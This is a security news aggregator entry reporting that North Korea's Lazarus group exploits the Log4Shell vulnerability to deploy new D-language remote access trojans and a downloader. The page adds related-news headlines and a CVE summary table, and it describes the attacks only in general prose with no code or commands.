Security News > 2023 > December > Lazarus hackers drop new RAT malware using 2-year-old Log4j bug

The notorious North Korean hacking group known as Lazarus continues to exploit CVE-2021-44228, aka "Log4Shell," this time to deploy three previously unseen malware families written in DLang.
The new malware are two remote access trojans named NineRAT and DLRAT and a malware downloader named BottomLoader.
The D programming language is rarely seen in cybercrime operations, so Lazarus probably chose it for new malware development to evade detection.
Following the compromise, Lazarus sets up a proxy tool for persistent access on the breached server, runs reconnaissance commands, creates new admin accounts, and deploys credential-stealing tools like ProcDump and MimiKatz.
Microsoft: Lazarus hackers breach CyberLink in supply chain attack.
Lazarus hackers breached dev repeatedly to deploy SIGNBT malware.
News URL
Related news
- Chinese hackers target Russian govt with upgraded RAT malware (source)
- Microsoft: New RAT malware used for crypto theft, reconnaissance (source)
- Hackers Exploit Severe PHP Flaw to Deploy Quasar RAT and XMRig Miners (source)
- Chinese FamousSparrow hackers deploy upgraded malware in attacks (source)
- We Smell a (DC)Rat: Revealing a Sophisticated Malware Delivery Chain (source)
- North Korean Hackers Deploy BeaverTail Malware via 11 Malicious npm Packages (source)
- Pakistan-Linked Hackers Expand Targets in India with CurlBack RAT and Spark RAT (source)
- Chinese Hackers Target Linux Systems Using SNOWLIGHT Malware and VShell Tool (source)
- State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns (source)
- Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery (source)
Related Vulnerability
DATE | CVE | VULNERABILITY TITLE | RISK |
---|---|---|---|
2021-12-10 | CVE-2021-44228 | Deserialization of Untrusted Data vulnerability in multiple products Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. network low complexity siemens apache intel debian fedoraproject sonicwall netapp cisco snowsoftware bentley percussion apple CWE-502 critical | 10.0 |